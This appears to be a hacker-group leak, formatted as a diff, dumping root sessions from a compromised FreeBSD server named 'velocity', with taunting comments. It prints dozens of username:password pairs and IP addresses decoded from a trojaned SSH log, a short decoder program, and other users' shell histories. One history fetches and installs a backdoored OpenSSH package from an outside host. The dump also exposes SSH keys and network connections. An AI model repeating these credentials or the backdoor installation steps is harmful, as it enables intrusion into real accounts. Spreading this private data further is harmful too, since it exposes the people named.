+drwxr-xr-x    3 root  wheel     1024 Nov  5  2008 lib/
+drwxr-xr-x    2 root  wheel      512 Apr 16  2007 libexec/
+drwxr-xr-x    2 root  wheel      512 Jan 12  2007 media/
+drwxr-xr-x    2 root  wheel      512 Jan 12  2007 mnt/
+dr-xr-xr-x    2 root  wheel      512 Jan 12  2007 proc/
+drwxr-xr-x    2 root  wheel     2560 Nov  5  2008 rescue/
+drwxr-xr-x    6 root  wheel      512 Jun 29 08:26 root/
+drwxr-xr-x    2 root  wheel     2560 Apr 16  2007 sbin/
+lrwxr-xr-x    1 root  wheel       11 Apr 16  2007 sys@ -> usr/src/sys
+drwxrwxrwt  103 root  wheel     3072 Jun 29 16:00 tmp/
+drwxr-xr-x   24 root  wheel      512 Jun 15 07:35 usr/
+drwxr-xr-x   24 root  wheel      512 Jun 15 05:05 var/
+
+
+[root@velocity:/var/run]# ls -la
+total 112
+drwxr-xr-x   5 root  wheel      512 Jun 26 21:20 ./
+drwxr-xr-x  24 root  wheel      512 Jun 15 05:05 ../
+-rw-r--r--   1 root  wheel        0 Jun 25 11:08 a.out
+-rw-------   1 root  wheel        0 Jun 25 15:43 as.core
+-rw-------   1 root  wheel        3 Jan 27  2008 cron.pid
+-rw-r--r--   1 root  wheel        4 Jan 27  2008 devd.pid
+srw-rw-rw-   1 root  wheel        0 Jan 27  2008 devd.pipe=
+-rw-r--r--   1 root  wheel     5659 Jan 27  2008 dmesg.boot
+-rw-------   1 root  wheel        5 Jun 25 08:57 inetd.pid
+-r--r--r--   1 root  wheel      245 Jun 23 23:21 ld-elf.so.hints
+-r--r--r--   1 root  wheel       67 Jan 27  2008 ld.so.hints
+srw-rw-rw-   1 root  wheel        0 Jan 27  2008 log=
+srw-------   1 root  wheel        0 Jan 27  2008 logpriv=
+drwxr-xr-x   2 bind  bind       512 Jan 12  2007 named/
+drwxrwx---   2 root  network    512 Jan 12  2007 ppp/
+drwxr-xr-x   2 root  wheel      512 Jan 27  2008 proftpd/
+-rw-r--r--   1 root  wheel        4 Jan 27  2008 proftpd.pid
+-rw-r--r--   1 root  wheel    14776 Jun 26 20:09 proftpd.scoreboard
+-rw-------   1 root  wheel       78 Jan 27  2008 sendmail.pid
+-rw-rw-rw-   1 root  wheel     2930 Jun 26 18:08 ssh.old // Backdoor _encrypted_ log file
+-rw-r--r--   1 root  wheel        6 Jun 17 18:29 sshd.pid
+-rw-------   1 root  wheel        3 Jan 27  2008 syslog.pid
+-rw-r--r--   1 root  wheel        0 Jan 27  2008 syslogd.sockets
+-rw-r--r--   1 root  wheel     1496 Jun 26 21:31 utmp
+[root@velocity:/var/run]# 
+
+[root@velocity:/var/run]# cat ssh.old 
+·°°´¶±Ɵ’šŝŠƙ•˜�´¶±Ɵ–’–‘•˜ƎŒŒ˜†ϥ¾¼¸ª¥¹¬�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±ƟœŠœ“‰š¾žϵ·°°´¶±ƟœŠœ“‰š¾žϵ·°°´¶±Ɵœ—žŒυ’žЎ͋—�´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´¶±ƟŒ’žŒ—őΘˆ—ύš�´°ª«ƟLJҎ΋Ҏɉ҈ʟœ†œ“šŋЏ³ȵ·°°´°ª«ƟLJҎǍҍ̉҈П“ž˜ś–‘Œ—–‹“–”šž‘ž“–š‘�´°ª«ƟLJҎǍҍ̉҈П“ž˜ś–‘Œ—–‹“–”šž‘ž“–š‘�´°ª«ƟLJҎǍҍ̉҈П“ś–‘Œ—–‹“–”šž‘ž“–š‘�´°ª«ƟLJҎǍҍ̉҈П“ž˜ʼnž‘–‹†І�´°ª«ƟLJҎǍҍ̉҈П“ž˜ʼnž‘–‹†І�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´¶±ƟŒ†œ…ŕš“šŒŠ–Œ�´¶±ƟŒ†œ…ŕš“šŒŠ–Œ�´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´¶±Ɵ”ŠžžŞŒ“ŒІΌ�´¶±Ɵ’˜ˆ‹™ő”–ž…�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±ƟŒ‹šŋœ‡’ύύ�´¶±Ɵœž……φʎŜ˅…†΍œ›�´¶±Ɵžŏž“”ž�´¶±Ɵžŏž“”ž�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵœ—žŒυ’žЎ͋—�´¶±ƟŒ’žŒ—őΘˆ—ύš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ–’–‘•˜ƎŒŒ˜†ϥ¾¼¸ª¥¹¬�´¶±Ɵ–’–‘•˜ƎŒŒ˜†ϥ¾¼¸ª¥¹¬�´¶±Ɵ“”˜ž…Ƒ½“–‘›ϑ�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵž“š‡ő–…ž‹š�´°ª«ƟχǑϋҍЊҋΟ•Š‘–ƎΌ�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵœ—žŒυ’žЎ͋—�´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵœ—žŒυ’žЎ͋—�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´°ª«ƟχǑϋҍЊҋΟ•Š‘–ƎΌ�´°ª«ƟLJҎ΋Ҏɉ҈ʟœ†œ“šŋЏ³ȵ·°°´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´°ª«ƟLJҎǍҍ̉҈Пœ†œ“šŋЏ³ȵ·°°´°ª«ƟLJҎǍҍ̉҈ПŒ’žŒ—őΘˆ—ύš�´°ª«ƟLJҎ΋Ҏɉ҈ʟœ†œ“šŋЏ³ȵ·°°´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´°ª«ƟLJҎ΋Ҏɉ҈ʟœ†œ“šŋЏ³ȵ·°°´°ª«ƟχǑϋҍЊҋΟ•Š‘–ƎΌ�´°ª«ƟχǑϋҍЊҋΟ•Š‘–ƎΌ�´°ª«ƟLJҎǍҍ̉҈ПŒ’žŒ—őΘˆ—ύš�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´°ª«ƟȆҋʑϏБΊΟœ†œ“šŋЏ“ȵ·°°´°ª«ƟȆҋʑϏБΊΟœ†œ“šŋЏ³ȵ·°°´¶±Ɵœ—žŒυ’žЎ͋—�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´°ª«ƟʈҍΊҎ̍҆ȟχ̞ˆ‘‹ō´»œӊ˥µ�´°ª«ƟLJҎ΋Ҏɉ҈ʟœ†šŋЏ³ȵ·°°´°ª«ƟȆҋʑϏБΊΟœ†šŋЏ“ȵ·°°´°ª«ƟLJҎ΋Ҏɉ҈ʟœ†œ“šŋЏ“ȵ·°°´°ª«ƟLJҎ΋Ҏɉ҈ʟœ†œ“šŋЏ³ȵ·°°´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵœ—žŒυ’žЎ͋—�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´°ª«ƟȆҋʑϏБΊΟœ†œ“šŋЏ³ȵ·°°´°ª«ƟʈҍΊҎ̍҆ȟχ̞ˆ‘‹ō´»œӊ˥µ�´¶±Ɵœ
—žŒυ’žЎ͋—�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ”ŠžžŞŒ“ŒІΌ�´¶±Ɵœ’’Ō”†“–‘͵·°°´¶±Ɵœ—žŒυ’žЎ͋—�´°ª«ƟȆҋʑϏБΊΟœ†œ“šŋϳȵ·°°´°ª«ƟȆҋʑϏБΊΟœ†œ“šŋЏ³ȵ·°°´°ª«ƟȆҋʑϏБΊΟœ†œ“šŋЏ³ȵ·°°´¶±Ɵ–’–‘•˜ƎŒŒ˜†ϥ¾¼¸ª¥¹¬󋈍
+
+
+
+[root@velocity:/var/run]# cat lame.c 
+#include 
+
+int main(int argc, char *argv[])
+{
+  FILE *n00bfile;
+  unsigned int lamechar;
+  if(argc < 2)
+          printf("Usage: %s filename\n",argv[0]);
+  if((n00bfile = fopen(argv[1],"r"))) {
+           while((lamechar = fgetc(n00bfile)) != EOF) {
+                            printf("%c",~lamechar);
+           }
+           fclose(n00bfile);
+  }
+  return 0;
+}
+
+// Let's try out our complex decryption program..
+
+[root@velocity:/var/run]# gcc -o lame lame.c
+[root@velocity:/var/run]# rm lame.c 
+[root@velocity:/var/run]# ./lame ssh.old 
+HOOKIN: romeo:bu9fjogr 
+HOOKIN: pimpinjg:1ssgy0ZACGUZFS // Our luvbirdz once again.. This time hidding..:)
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: cpu:lloverAa1
+HOOKIN: cpu:lloverAa1
+HOOKIN: chaos1:ma012th
+HOOKIN: yaquis:closereply456
+HOOKIN: smash:n1gwh0re
+HOOKOUT: 98.124.176.76 cycle:t00L8
+HOOKOUT: 98.192.246.70 lag:droppinshitlikeanalien
+HOOKOUT: 98.192.246.70 lag:droppinshitlikeanalien
+HOOKOUT: 98.192.246.70 l:droppinshitlikeanalien
+HOOKOUT: 98.192.246.70 lag:vanity09
+HOOKOUT: 98.192.246.70 lag:vanity09
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: matt:zeda02
+HOOKIN: matt:zeda02
+HOOKIN: matt:zeda02
+HOOKIN: matt:zeda02
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: matt:zeda02
+HOOKIN: yaquis:closereply456
+HOOKIN: psycoz:jelesuis
+HOOKIN: psycoz:jelesuis
+HOOKIN: yaquis:closereply456
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: yaquis:closereply456
+HOOKIN: kruapra:asls0923
+HOOKIN: omgwtf:nokiaz
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: yaquis:closereply456
+HOOKIN: matt:zeda02
+HOOKIN: matt:zeda02
+HOOKIN: matt:zeda02
+HOOKIN: ste:tcxm1212
+HOOKIN: cazz1961:c4zzy1rcd
+HOOKIN: apo:parolka
+HOOKIN: apo:parolka
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: chaos1:ma012th
+HOOKIN: smash:n1gwh0re
+HOOKIN: katsst:ch0w$ie
+HOOKIN: katsst:ch0w$ie
+HOOKIN: pimpinjg:1ssgy0ZACGUZFS
+HOOKIN: pimpinjg:1ssgy0ZACGUZFS
+HOOKIN: blkgraz:.Blind1.
+HOOKIN: katsst:ch0w$ie
+HOOKIN: katsst:ch0w$ie
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: alexbb:noizarte
+HOOKOUT: 189.14.205.42 junior:123
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: katsst:ch0w$ie
+HOOKIN: katsst:ch0w$ie
+HOOKIN: katsst:ch0w$ie
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: chaos1:ma012th
+HOOKIN: matt:zeda02
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: katsst:ch0w$ie
+HOOKIN: katsst:ch0w$ie
+HOOKIN: katsst:ch0w$ie
+HOOKIN: katsst:ch0w$ie
+HOOKIN: chaos1:ma012th
+HOOKIN: katsst:ch0w$ie
+HOOKIN: katsst:ch0w$ie
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: yaquis:closereply456
+HOOKOUT: 189.14.205.42 junior:123
+HOOKOUT: 98.124.176.76 cycle:t00L8
+HOOKIN: ioplex:I*!@ONLINE
+HOOKOUT: 98.192.246.70 cycle:t00L8
+HOOKOUT: 98.192.246.70 smash:n1gwh0re
+HOOKOUT: 98.124.176.76 cycle:t00L8
+HOOKIN: ioplex:I*!@ONLINE
+HOOKOUT: 98.124.176.76 cycle:t00L8
+HOOKOUT: 189.14.205.42 junior:123
+HOOKOUT: 189.14.205.42 junior:123
+HOOKOUT: 98.192.246.70 smash:n1gwh0re
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: yaquis:closereply456
+HOOKOUT: 89.46.100.252 cycle:t00l8
+HOOKOUT: 89.46.100.252 cycle:t00L8
+HOOKIN: chaos1:ma012th
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: yaquis:closereply456
+HOOKIN: yaquis:closereply456
+HOOKOUT: 67.225.142.98 0x3aownt:rKDcb-54ZJ // puma.makosolutions.com
+HOOKOUT: 98.124.176.76 cyber:t00L8
+HOOKOUT: 89.46.100.252 cyber:t00l8
+HOOKOUT: 98.124.176.76 cycle:t00l8
+HOOKOUT: 98.124.176.76 cycle:t00L8
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: chaos1:ma012th
+HOOKIN: ioplex:I*!@ONLINE
+HOOKOUT: 89.46.100.252 cycle:t00L8
+HOOKOUT: 67.225.142.98 0x3aownt:rKDcb-54ZJ // puma.makosolutions.com
+HOOKIN: chaos1:ma012th
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: kruapra:asls0923
+HOOKIN: cmm:skylin3
+HOOKIN: chaos1:ma012th
+HOOKOUT: 89.46.100.252 cycle:t0L8
+HOOKOUT: 89.46.100.252 cycle:t00L8
+HOOKOUT: 89.46.100.252 cycle:t00L8
+HOOKIN: pimpinjg:1ssgy0ZACGUZFS
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: katsst:ch0w$ie
+HOOKIN: yaquis:closereply456
+HOOKIN: smash:n1gwh0re
+HOOKIN: smash:n1gwh0re
+HOOKIN: smash:n1gwh0re
+HOOKIN: smash:n1gwh0re
+HOOKIN: katsst:ch0w$ie
+HOOKIN: yaquis:closereply456
+HOOKIN: yaquis:closereply456
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: pimpinjg:1ssgy0ZACGUZFS
+HOOKIN: katsst:ch0w$ie
+HOOKIN: blkgraz:.Blind1.
+HOOKIN: blkgraz:.Blind1.
+HOOKIN: blkgraz:.Blind1.
+HOOKIN: blkgraz:.Blind1.
+HOOKOUT: 89.46.100.252 cycle:t00L8
+[root@velocity:/var/run]#
+
+// 0wn3d by y0ur 0wn backd00r.. 
+
+
+[root@velocity:~]# cat /etc/profile 
+# $FreeBSD: src/etc/profile,v 1.14 2004/06/06 11:46:27 schweikh Exp $
+#
+# System-wide .profile file for sh(1).
+#
+# Uncomment this to give you the default 4.2 behavior, where disk
+# information is shown in K-Blocks
+# BLOCKSIZE=K; export BLOCKSIZE
+#
+# For the setting of languages and character sets please see
+# login.conf(5) and in particular the charset and lang options.
+# For full locales list check /usr/share/locale/*
+# You should also read the setlocale(3) man page for information
+# on how to achieve more precise control of locale settings.
+#
+# Read system messages
+# msgs -f
+# Allow terminal messages
+# mesg y
+export PS1="[\u@\h:\w]\\$ "
+alias ls='/bin/ls -GFa'
+alias ll='/bin/ls -GFal'
+alias lo='/bin/ls -GFalo'
+export LSCOLORS=ExGxFxf5CxfgDxabagacad
+export EDITOR=pico
+TMOUT=1800
+
+export HISTFILE=~/.bshrc // Bypassing backdoor HISTFILE=/dev/null
+export HISTSIZE=1500   
+
+[root@velocity:~]# 
+
+// After a while... 
+
+[root@velocity:~]# cat /root/.bshrc 
+w
+rm -rf hax
+rm -rf lol.tar.gz
+ls -la
+exit
+w
+wget http://board.whois.co.kr/lol.tar.gz // See attachments section for lol.tar.gz backdoor
+tar -zxf lol.tar.gz
+cd hax 
+ls -la 
+ssh -v 
+vi version.h // OpenSSH Version editing
+./quick // Installation
+cd .. 
+ls -la
+cd /home/romeo/
+ls -la
+cat  .bash_history
+ls -la
+cd .irssi/
+ls -la
+rm -rf away.log // Too late..
+cd ..
+ls -la
+w
+ps aux | grep ssh
+netstat -an | grep :22 // See the remaining 18 netstats.. not counting who and kills.. 
+netstat -an | grep 22
+netstat -an | grep ssh
+netstat -a | grep 22
+netstat -an | grep .22
+env
+netstat -an | grep 188.51.85.13
+netstat -an | grep 248.22
+w
+netstat -anp | grep 248.22
+netstat -an | grep 248.22
+whois 98.242.244.25
+ps aux | grep ssh
+kill -9 8095
+kill -9 8128
+kill -9 8866
+ps aux | grep ssh
+kill -9 92546
+kill -9 93418
+w
+env
+netstat -an | grep 188.51.85.13
+netstat -an | grep .248.22
+w
+ls -al
+cat > w
+sh x
+sh w
+ls -la
+bas w
+bash w
+ls -la
+cat w
+netstat -tanp 
+ps aux | grep ssh
+kill -9 43929
+kill -9 75936
+kill -9 75934
+ps aux | grep ssh
+kll -9 23783
+kill -9 23783
+ps aux | grep ssh
+time
+date
+ls -la
+chmod +x w
+./w
+ls -la
+rm -f w
+ps aux | grep ssh
+kill -9 22353
+ ps aux | grep ssh
+kill -9 9078
+ ps aux | grep ssh
+env
+netstat -an | grep 188.51.85.13
+netstat -an | grep .248.22
+csf
+last | grep 98.242.244.25
+lastlog
+w
+ls -la
+netstat -anp tcp
+netstat -anp tcp | grep .22
+netstat -anp tcp | grep 72.20.28.226.6697
+netstat -anp
+netstat -anp tcp
+sockstat
+ps aux | grep ioplex
+exit
+w
+cd ~pimpinjg/
+ls -la
+cat .bash_history
+w
+ls -la
+cd /
+ls -la
+cd /tmp
+ls -la
+cd /var/log
+ls -la
+tail -f messages
+cat security | grep romeo
+cat security | grep root
+w
+cd ~romeo
+ls -la
+cat  .bash_history
+ps aux | grep romeo
+ps aux | grep romeo
+ps aux | grep ssh
+w
+ls -la
+w
+ls -la
+ps aux
+ps aux | grep irc
+ping velocity.vitalspeeds.com
+[root@velocity:~]# 
+
+/* 
+RoMe0 in panic mode.. netstat.. netstat.. netstat.. 
+Thank you for all the fish.. n00bfish..
+*/
+
+[root@velocity:~]# cat /usr/home/pimpinjg/.bshrc 
+nano .bashrc
+clear
+ls
+grep -r motd
+grep -r motd *
+clear
+rm -rf znc*
+clear
+ls
+clear
+PS1='\033[1;32m\]\033[1;30m\][\033[1;32m\]root\[\033[1;30m\]@\[\033[1;32m\]\h\[\033[1;30m\]]:[\033[1;32m\]\w\[\033[1;30m\]]\[\033[1;30m\]\$\[\033[0m\] '
+clear
+uptime
+ps aux
+ls -al
+uptime
+clear
+ls
+nano .profile
+nano .bashprompt
+exit
+clear
+screen -r
+clear
+exit
+clear
+screen -r
+screen -r
+clear
+exit
+[root@velocity:~]# 
+
+// Advanced Linux Administration Skillz.. The 2 years of extensive training finally paid off.. 
+
+
+[root@velocity:~]# cat /usr/home/pimpinjg/.ssh/known_hosts
+localhost ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxLk6rsYWY3ASi1AXMnWKeEd9Tqdcw0P+v7gGKHjGUdcPQZ00S5xotswbKD4/XI3StqVkQLOrcOvDebZ7uJjSpW/d7G1BeMdav8QjS+Q/Hxk8tzPPI+95/iviCW3dQbtxOEdXwcgTucw7d4GaGqexScbG+kOYzGc6ZZxSKJlqiM29s6ri1kfLDay/5/YZnz3Ms3081Hsxnrdbb0TOrpOJdbirgL4Ipe0DBaf1d/QQxGf6CFTbFKsm4RWuQWICiF7AFmHqgElMUYodjnDTmJjwjFbIipUsPvEjNabuYXHkUaA2iOYvpso13HdgYVdgJpFc269L435Uh4XBolEziEnrWQ==
+72.20.28.205 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxLk6rsYWY3ASi1AXMnWKeEd9Tqdcw0P+v7gGKHjGUdcPQZ00S5xotswbKD4/XI3StqVkQLOrcOvDebZ7uJjSpW/d7G1BeMdav8QjS+Q/Hxk8tzPPI+95/iviCW3dQbtxOEdXwcgTucw7d4GaGqexScbG+kOYzGc6ZZxSKJlqiM29s6ri1kfLDay/5/YZnz3Ms3081Hsxnrdbb0TOrpOJdbirgL4Ipe0DBaf1d/QQxGf6CFTbFKsm4RWuQWICiF7AFmHqgElMUYodjnDTmJjwjFbIipUsPvEjNabuYXHkUaA2iOYvpso13HdgYVdgJpFc269L435Uh4XBolEziEnrWQ==
+189.14.205.42 ssh-dss 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
+
+[root@velocity:~]# cat /usr/home/pimpinjg/.ssh/authorized_keys
+ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAn6d6bVIeir4IWs3b8F8kUfiaHKXZ+4nwuQpRMaoI67rqY8Tmjp5oFgT7CeRCIF0GUXAjY3my4T3GcV0ed+/5ilyoC0NG5W/TAvF62IQpQop9apP8HBlyiOaHuXgNVbit6/1EUW4SvLWdUe8zNqTWPw0/qZ2eQAEH8E+cbqT8LYsNWsQI9tpcJykigRZF1TqjL6vJtbQLqSgr2Gdz1+Xv9wXKlxdHSLa5ay5VuEij6w6rUS7ZI9OoOqGA2NICjs008cOy3yhCVHh1V7I50rLoPZWBZa72VBPPMvqiJpHbcIP8+NaXnIeLoINnYsV3xk27lSDT0UBBHLQ5miaLnvEzgw== pimpinjg@mercedes.pimpinjg.ch
+
+
+[root@velocity:/var/run]# lsof -i -n | grep ssh
+sshd      19971       root    3u  IPv6 0xcc1771d0      0t0  TCP *:ssh (LISTEN)
+sshd      19971       root    4u  IPv4 0xc585e000      0t0  TCP *:ssh (LISTEN)
+
+sshd      23362       root    3u  IPv4 0xca6ae570      0t0  TCP 72.20.28.248:ssh->188.51.85.13:57409 (ESTABLISHED) 
+sshd      23383      romeo    3u  IPv4 0xca6ae570      0t0  TCP 72.20.28.248:ssh->188.51.85.13:57409 (ESTABLISHED) 
+
+sshd      28333       root    3u  IPv4 0xc9fc4570      0t0  TCP 72.20.28.206:ssh->72.223.92.235:6345 (ESTABLISHED)
+sshd      28335     yaquis    3u  IPv4 0xc9fc4570      0t0  TCP 72.20.28.206:ssh->72.223.92.235:6345 (ESTABLISHED)
+sshd      30593       root    3u  IPv4 0xc97b93a0      0t0  TCP 72.20.28.204:ssh->75.84.149.5:1294 (ESTABLISHED)
+sshd      30595     katsst    3u  IPv4 0xc97b93a0      0t0  TCP 72.20.28.204:ssh->75.84.149.5:1294 (ESTABLISHED)
+sshd      30595     katsst   10u  IPv4 0xc5b901d0      0t0  TCP 72.20.3.98:63271->192.168.1.1:http (SYN_SENT)
+sshd      30595     katsst   11u  IPv4 0xc590eae0      0t0  TCP 72.20.3.98:60359->91.184.73.195:46464 (ESTABLISHED)
+sshd      30595     katsst   12u  IPv4 0xc94fc570      0t0  TCP 72.20.3.98:61645->79.66.132.125:44020 (ESTABLISHED)
+sshd      30595     katsst   13u  IPv4 0xc5eb2910      0t0  TCP 72.20.3.98:62162->192.168.1.1:http (SYN_SENT)
+sshd      30595     katsst   14u  IPv4 0xc996d000      0t0  TCP 127.0.0.1:58269->127.0.0.1:33282 (SYN_SENT)
+sshd      30595     katsst   15u  IPv4 0xc954e910      0t0  TCP 72.20.3.98:60168->72.185.123.4:6601 (ESTABLISHED)
+sshd      30595     katsst   17u  IPv4 0xc99f81d0      0t0  TCP 72.20.3.98:60170->66.245.139.243:53066 (ESTABLISHED)
+sshd      30595     katsst   18u  IPv4 0xca0c1570      0t0  TCP 72.20.3.98:60172->124.168.34.236:50666 (ESTABLISHED)
+sshd      30595     katsst   19u  IPv4 0xcaf02910      0t0  TCP 72.20.3.98:60173->130.212.54.5:28573 (ESTABLISHED)
+sshd      30595     katsst   22u  IPv4 0xc9dd9740      0t0  TCP 72.20.3.98:60180->173.22.219.92:64415 (ESTABLISHED)
+sshd      30595     katsst   23u  IPv4 0xc622c570      0t0  TCP 72.20.3.98:60178->173.54.28.183:22677 (ESTABLISHED)
+sshd      30595     katsst   27u  IPv4 0xca10bcb0      0t0  TCP 72.20.3.98:60183->79.101.217.199:55824 (ESTABLISHED)
+sshd      30595     katsst   28u  IPv4 0xcc5021d0      0t0  TCP 72.20.3.98:60188->92.72.182.81:50009 (ESTABLISHED)
+sshd      30595     katsst   29u  IPv4 0xcc3dd740      0t0  TCP 72.20.3.98:60189->65.26.34.13:23928 (ESTABLISHED)
+sshd      30595     katsst   30u  IPv4 0xc972b740      0t0  TCP 72.20.3.98:60190->87.80.43.167:49878 (ESTABLISHED)
+sshd      30595     katsst   35u  IPv4 0xca1413a0      0t0  TCP 72.20.3.98:60195->61.229.122.218:42282 (ESTABLISHED)
+sshd      30595     katsst   38u  IPv4 0xc61be910      0t0  TCP 72.20.3.98:60198->67.185.180.151:21366 (ESTABLISHED)
+sshd      30595     katsst   42u  IPv4 0xca1cb1d0      0t0  TCP 72.20.3.98:60202->81.246.198.243:21771 (ESTABLISHED)
+sshd      30595     katsst   43u  IPv4 0xc9db61d0      0t0  TCP 72.20.3.98:60203->71.228.40.165:13289 (ESTABLISHED)
+sshd      30595     katsst   46u  IPv4 0xc61bd3a0      0t0  TCP 72.20.3.98:60217->70.69.35.95:48486 (ESTABLISHED)
+sshd      30595     katsst   49u  IPv4 0xc92c6000      0t0  TCP 72.20.3.98:60224->24.245.45.179:56678 (ESTABLISHED)
+sshd      30595     katsst   52u  IPv4 0xcae45740      0t0  TCP 72.20.3.98:60229->66.41.52.92:26396 (ESTABLISHED)
+sshd      30595     katsst   56u  IPv4 0xca03d740      0t0  TCP 72.20.3.98:60258->122.167.178.174:29404 (ESTABLISHED)
+sshd      30595     katsst   82u  IPv4 0xc9dbacb0      0t0  TCP 72.20.3.98:60295->77.250.210.43:62003 (ESTABLISHED)
+sshd      30595     katsst   85u  IPv4 0xca0793a0      0t0  TCP 72.20.3.98:60311->93.97.7.183:38461 (ESTABLISHED)
+sshd      30595     katsst   86u  IPv4 0xc9a1c000      0t0  TCP 72.20.3.98:60307->65.33.173.202:24132 (ESTABLISHED)
+sshd      30595     katsst   87u  IPv4 0xc986f910      0t0  TCP 72.20.3.98:60312->74.173.228.216:61577 (ESTABLISHED)
+sshd      30622       root    3u  IPv4 0xc98fb000      0t0  TCP 72.20.28.205:ssh->89.30.147.8:3766 (ESTABLISHED)
+sshd      30890       root    3u  IPv4 0xc58eb000      0t0  TCP 72.20.28.205:ssh->89.30.147.8:3812 (ESTABLISHED)
+[root@velocity:/var/run]# 
+
+ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ
+ANTISECFORLULZ														      ANTISECFORLULZ
+ANTISECFORLULZ	[root@velocity:/]# ps -aux | grep romeo									      ANTISECFORLULZ
+ANTISECFORLULZ	root       98610  0.0  0.2  5400  2004  ??  Is   12:16PM   0:00.19 sshd: romeo [priv] (sshd)		      ANTISECFORLULZ
+ANTISECFORLULZ	romeo      98648  0.0  0.2  5384  2052  ??  S    12:16PM   0:03.21 sshd:  (sshd)			      ANTISECFORLULZ
+ANTISECFORLULZ	romeo      27874  0.0  0.6  9104  6212  p0  S+    2:21PM   0:04.59 irssi -h absolute.ownage.net		      ANTISECFORLULZ
+ANTISECFORLULZ	romeo      32521  0.0  0.1  3272  1384  p0  Is    7:40PM   0:00.05 /usr/local/bin/bash                        ANTISECFORLULZ
